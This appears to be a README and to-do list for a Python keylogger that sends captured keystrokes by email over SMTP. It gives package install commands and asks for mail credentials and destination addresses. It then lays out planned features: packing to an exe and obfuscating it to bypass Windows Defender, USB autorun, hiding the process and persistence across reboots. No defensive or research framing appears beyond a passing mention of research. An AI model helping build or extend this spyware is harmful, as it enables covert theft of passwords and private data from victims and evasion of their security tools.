The provided code is incomplete; you need to make necessary changes for the script to be fully executable.
- Ensure that you carefully read the comments and implement the required changes as specified in the script.
- Input your mail credentials for the SMTP connection.
- Specify the destination emails to receive the logged keys.
- If you are not receiving emails, check your spam folder in the destination mail.
sudo apt-get update
sudo apt-get install python3
sudo apt-get install python3-pip
pip install pynput
pip install secure-smtplib
pip install PyMails
git clone /~
still not finding libraries refer to
make it commpatible to windows
the code should be able to access the powershell of the windows
obfscation py->exe->packers(bypass windows defender)
autorun script for USB plugin
Enhancement of the keylogger its mailing system is perfect for long-term implementation on cloud or research about it
hidding exe process
exe file br br run ho jab jab bhi pc shutdown hokr on ho